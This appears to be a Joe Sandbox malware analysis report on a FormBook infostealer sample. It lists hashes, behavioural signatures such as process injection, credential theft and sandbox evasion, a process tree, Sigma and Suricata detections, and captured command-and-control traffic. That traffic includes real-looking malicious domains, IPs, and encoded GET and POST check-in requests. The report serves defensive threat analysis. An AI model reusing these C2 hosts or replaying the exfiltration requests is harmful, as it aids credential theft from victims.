Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xaqnaB0rcW.exe

Overview

General Information

Sample name:xaqnaB0rcW.exe
renamed because original name is a hash value
Original sample name:dc710b8bed55e4cf0b6454836e15714ede75a8fa952d2756cb9b437425a6f6e9.exe
Analysis ID:1589075
MD5:dd5acffde51ef27c585911dea96c4336
SHA1:62a6b77a79d556fe171fdafea079fc88e400c42e
SHA256:dc710b8bed55e4cf0b6454836e15714ede75a8fa952d2756cb9b437425a6f6e9
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • xaqnaB0rcW.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\xaqnaB0rcW.exe" MD5: DD5ACFFDE51EF27C585911DEA96C4336)
    • svchost.exe (PID: 7636 cmdline: "C:\Users\user\Desktop\xaqnaB0rcW.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • HSxcaEmiOTH.exe (PID: 1104 cmdline: "C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TCPSVCS.EXE (PID: 7884 cmdline: "C:\Windows\SysWOW64\TCPSVCS.EXE" MD5: 73905DB831B4F37F0673D2DD5BBF7779)
          • HSxcaEmiOTH.exe (PID: 3604 cmdline: "C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8056 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2604361912.0000000005510000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.2601035129.00000000006A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.2602376251.0000000000930000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.1658897103.0000000003A50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.1658225987.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\xaqnaB0rcW.exe", CommandLine: "C:\Users\user\Desktop\xaqnaB0rcW.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\xaqnaB0rcW.exe", ParentImage: C:\Users\user\Desktop\xaqnaB0rcW.exe, ParentProcessId: 7576, ParentProcessName: xaqnaB0rcW.exe, ProcessCommandLine: "C:\Users\user\Desktop\xaqnaB0rcW.exe", ProcessId: 7636, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\xaqnaB0rcW.exe", CommandLine: "C:\Users\user\Desktop\xaqnaB0rcW.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\xaqnaB0rcW.exe", ParentImage: C:\Users\user\Desktop\xaqnaB0rcW.exe, ParentProcessId: 7576, ParentProcessName: xaqnaB0rcW.exe, ProcessCommandLine: "C:\Users\user\Desktop\xaqnaB0rcW.exe", ProcessId: 7636, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T09:15:09.196526+010028554641A Network Trojan was detected192.168.2.749970104.21.28.6580TCP
                2025-01-11T09:15:11.466798+010028554641A Network Trojan was detected192.168.2.749971104.21.28.6580TCP
                2025-01-11T09:15:13.353106+010028554641A Network Trojan was detected192.168.2.749972104.21.28.6580TCP
                2025-01-11T09:15:22.542645+010028554641A Network Trojan was detected192.168.2.749974104.21.54.12680TCP
                2025-01-11T09:15:25.063268+010028554641A Network Trojan was detected192.168.2.749975104.21.54.12680TCP
                2025-01-11T09:15:27.725310+010028554641A Network Trojan was detected192.168.2.749976104.21.54.12680TCP
                2025-01-11T09:15:36.803552+010028554641A Network Trojan was detected192.168.2.74997869.57.163.6480TCP
                2025-01-11T09:15:39.337096+010028554641A Network Trojan was detected192.168.2.74997969.57.163.6480TCP
                2025-01-11T09:15:41.881785+010028554641A Network Trojan was detected192.168.2.74998069.57.163.6480TCP
                2025-01-11T09:15:50.716775+010028554641A Network Trojan was detected192.168.2.749982101.32.205.6180TCP
                2025-01-11T09:15:53.502097+010028554641A Network Trojan was detected192.168.2.749983101.32.205.6180TCP
                2025-01-11T09:15:55.731402+010028554641A Network Trojan was detected192.168.2.749984101.32.205.6180TCP
                2025-01-11T09:16:05.145567+010028554641A Network Trojan was detected192.168.2.749986103.159.36.6680TCP
                2025-01-11T09:16:07.695434+010028554641A Network Trojan was detected192.168.2.749987103.159.36.6680TCP
                2025-01-11T09:16:10.742732+010028554641A Network Trojan was detected192.168.2.749988103.159.36.6680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: xaqnaB0rcW.exeVirustotal: Detection: 59%Perma Link
                Source: xaqnaB0rcW.exeReversingLabs: Detection: 83%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2604361912.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2601035129.00000000006A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2602376251.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658897103.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658225987.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2600811626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2602361204.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658953431.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: xaqnaB0rcW.exeJoe Sandbox ML: detected
                Source: xaqnaB0rcW.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HSxcaEmiOTH.exe, 00000004.00000002.2601053518.0000000000B9E000.00000002.00000001.01000000.00000005.sdmp, HSxcaEmiOTH.exe, 00000006.00000000.1736924979.0000000000B9E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: tcpsvcs.pdb source: svchost.exe, 00000002.00000002.1658450513.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658469948.0000000003012000.00000004.00000020.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000004.00000002.2601780652.0000000001268000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: xaqnaB0rcW.exe, 00000000.00000003.1346062585.0000000003900000.00000004.00001000.00020000.00000000.sdmp, xaqnaB0rcW.exe, 00000000.00000003.1348367351.0000000003760000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548490158.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546380846.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658601203.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658601203.000000000389E000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1671550855.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2603154113.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1668866979.0000000000839000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2603154113.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: xaqnaB0rcW.exe, 00000000.00000003.1346062585.0000000003900000.00000004.00001000.00020000.00000000.sdmp, xaqnaB0rcW.exe, 00000000.00000003.1348367351.0000000003760000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1548490158.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546380846.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658601203.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658601203.000000000389E000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, TCPSVCS.EXE, 00000005.00000003.1671550855.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2603154113.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1668866979.0000000000839000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2603154113.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tcpsvcs.pdbGCTL source: svchost.exe, 00000002.00000002.1658450513.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658469948.0000000003012000.00000004.00000020.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000004.00000002.2601780652.0000000001268000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: TCPSVCS.EXE, 00000005.00000002.2601089290.000000000073D000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2604587139.000000000341C000.00000004.10000000.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1964888144.000000003FBCC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: TCPSVCS.EXE, 00000005.00000002.2601089290.000000000073D000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2604587139.000000000341C000.00000004.10000000.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1964888144.000000003FBCC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00396CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00396CA9
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003960DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003960DD
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003963F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003963F9
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0039EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0039EB60
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0039F56F FindFirstFileW,FindClose,0_2_0039F56F
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0039F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0039F5FA
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A1B2F
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A1C8A
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003A1F94
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0041C4E0 FindFirstFileW,FindNextFileW,FindClose,5_2_0041C4E0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 4x nop then xor eax, eax5_2_00409E40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 4x nop then pop edi5_2_0040E0F4
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 4x nop then mov ebx, 00000004h5_2_00AE0528

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49972 -> 104.21.28.65:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49970 -> 104.21.28.65:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49971 -> 104.21.28.65:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49975 -> 104.21.54.126:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 101.32.205.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49974 -> 104.21.54.126:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49980 -> 69.57.163.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49982 -> 101.32.205.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 69.57.163.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 103.159.36.66:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 101.32.205.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 103.159.36.66:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49976 -> 104.21.54.126:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49987 -> 103.159.36.66:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49979 -> 69.57.163.64:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.binjai77rtp11f.xyz
                Source: Joe Sandbox ViewIP Address: 69.57.163.64 69.57.163.64
                Source: Joe Sandbox ViewASN Name: FORTRESSITXUS FORTRESSITXUS
                Source: Joe Sandbox ViewASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
                Source: Joe Sandbox ViewASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_003A4EB5
                Source: global trafficHTTP traffic detected: GET /s1oh/?UfjxuDP=BXpE0/AUcXIdlK4Vr8yV3zIibIy5i6h6aTfhPuGOJWtXj1ch45iPBtMttb76vGkDjkWsjXgzDhYROXwUhHpTV07xmH02YSuxOuXTBNCt6lVM/O+JsRG51Y9B+1PgAZMJBQ/X3Nrmukkh&LRJdx=qxGHfdRH_npdPLS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.3nhc3a.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /9fei/?UfjxuDP=9hwMTPf/o+GewSNr0PZcNyjUpNs4oV11JaaOJ/4hdktbA5fMK3ajxj9W7lKuvaKLl9eyr3kbg9/8Pn7CG+MHJwFOLy3VCtOxW9qlL7MmBkbbL06rPuqE58QtHe+NUuoOX41pN6Zc3VUv&LRJdx=qxGHfdRH_npdPLS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.binjai77rtp11f.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /wmxx/?LRJdx=qxGHfdRH_npdPLS&UfjxuDP=zdZDiDz9NcDAxdPT/uWXYjOZ7xdg3NSLew0AnBcQq7wq0cWPcv1qrwj1W7YWM/gj4sM+0wouZwjbIFjwenXJ4N4USgfIRCAFwiyvEbCB1BK26HZp+qINnmDOYTAlL9plemOtuNo0oYKs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.vietnamtour.proUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /zbqa/?UfjxuDP=VL/7+LncUKg93smxMKx16PJyQUb9eyDUwLSrEzeHp8x1IkOi8uzSCeY3r5BUse/S3M+vRdZQg/I11o5hNVVA9RQKtvF2RwQZX7jt+LR0GxdMQnQscMzB9kd5j+7KhxpY8qBrHtH6UUu4&LRJdx=qxGHfdRH_npdPLS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.showyourstyle.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /gtil/?LRJdx=qxGHfdRH_npdPLS&UfjxuDP=yyp7zDkplnhFTYOX3ExWxIUq0IjfKVeUoM/g1Z3Itn+WrDb/JBNc3lr1wwtaU5LmbkDFl3V0HSUPXljFvyI/+0E8p+6jedrKHm5NubPBlXEWe4lmKrOCn9YHOrHb1DBA91+ELFM00oq5 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.rwse6wjx.sbsUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /nfd2/?UfjxuDP=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZH6APjZoiCJja95RSvj5+jnDMDZLlQYpKd2QqndCwykWooVuOpC6xjiJx&LRJdx=qxGHfdRH_npdPLS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.rokeyfashion.storeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficDNS traffic detected: DNS query: www.3nhc3a.top
                Source: global trafficDNS traffic detected: DNS query: www.binjai77rtp11f.xyz
                Source: global trafficDNS traffic detected: DNS query: www.vietnamtour.pro
                Source: global trafficDNS traffic detected: DNS query: www.showyourstyle.top
                Source: global trafficDNS traffic detected: DNS query: www.rwse6wjx.sbs
                Source: global trafficDNS traffic detected: DNS query: www.rokeyfashion.store
                Source: unknownHTTP traffic detected: POST /9fei/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Length: 220Content-Type: application/x-www-form-urlencodedConnection: closeHost: www.binjai77rtp11f.xyzOrigin: http://www.binjai77rtp11f.xyzReferer: http://www.binjai77rtp11f.xyz/9fei/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like GeckoData Raw: 55 66 6a 78 75 44 50 3d 77 6a 59 73 51 37 79 68 6e 39 72 4a 6d 57 55 52 6a 4b 74 49 4f 31 6a 55 36 4b 6b 2b 68 68 51 4b 4f 4f 76 6f 4d 38 34 6f 53 30 67 74 49 76 66 4d 47 67 4f 6e 30 53 5a 4f 6e 30 37 58 71 2b 66 59 69 4e 47 53 71 6b 67 44 67 70 48 73 50 31 69 38 50 39 49 4a 58 48 77 63 49 53 48 4f 4d 37 69 70 57 75 44 33 50 34 63 4a 42 57 62 48 4d 46 36 52 42 71 50 6b 77 65 51 38 42 63 4b 6b 44 4f 6f 74 58 59 35 2f 46 62 35 65 74 56 67 68 65 48 59 34 52 76 6a 70 30 76 7a 61 6a 49 76 50 49 71 58 6b 47 4d 4b 5a 34 72 59 2f 47 77 62 57 51 65 58 51 52 7a 30 7a 31 38 7a 78 75 4b 4d 6c 70 75 6f 66 59 69 51 76 66 39 69 38 6d 6b 43 4b 73 6f 4a 33 41 41 3d 3d Data Ascii: UfjxuDP=wjYsQ7yhn9rJmWURjKtIO1jU6Kk+hhQKOOvoM84oS0gtIvfMGgOn0SZOn07Xq+fYiNGSqkgDgpHsP1i8P9IJXHwcISHOM7ipWuD3P4cJBWbHMF6RBqPkweQ8BcKkDOotXY5/Fb5etVgheHY4Rvjp0vzajIvPIqXkGMKZ4rY/GwbWQeXQRz0z18zxuKMlpuofYiQvf9i8mkCKsoJ3AA==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 08:14:52 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
